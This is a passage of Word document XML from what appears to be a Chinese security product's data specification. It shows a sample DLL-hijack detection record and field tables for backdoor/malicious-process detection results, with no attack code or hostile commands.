        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hijack_image_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "extension": ".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_directory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "c:\\dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "c:\\dll\\dlltest.dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_base_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0x26150000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>load_reason</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "dlltest.dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "file_md5": "a3c033d7f7229e962dc25836f94868b1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "attributes": 32,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>load_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1527222087,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 80896,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b_pe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_ctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_mtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_atime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>black_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0x00010000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1828,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>create_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1527222087,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_wow64": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1788,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_64bit": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>image_file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "E:\\TEst\\bin\\Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "explorer.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_ctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_mtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_atime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>black_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hijacked_image_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "extension": ".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_directory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "e:\\test\\bin",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_base_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0x28850000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>load_reason</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "dlltest.dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "attributes": 32,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>load_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1527222087,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 80896,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b_pe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_ctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_mtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_atime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "md5"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "code_section_md5"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "sha1" = "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "sha256"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "code_section_sha1"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "code_section_sha256"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>black_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35182508" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="503" w:name="_Toc115166324"/>
      <w:bookmarkStart w:id="504" w:name="后门类型恶意进程"/>
      <w:bookmarkEnd w:id="500"/>
      <w:bookmarkEnd w:id="502"/>
      <w:r>
        <w:t>后门类型：恶意进程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="503"/>
    </w:p>
    <w:p w14:paraId="7A5184EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ruleResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 结构信息</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1745"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="16EF19F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465CDA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="708F007D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3912BB8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EB167FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6EF8D7AB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DC5113E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>virusName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C336DE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C0C5D30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="215FB03D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>病毒名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="659428A0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B76AE36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>virusDescription</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73062774" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E24852D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A15E8E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F0DAD2F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE76BFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>libUpdateTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C2708B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3086A169" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37EB0AE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="615F922C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AB9D48A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>libName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="261BA4A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D875696" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C115E69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="436C3782" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A778C62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>virusInstruct</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="475162BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1845F662" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F09BB88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修复方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="299A4DAB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>静态信息数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1387"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="63CA33B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FA271FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35FBBAB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15370D72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
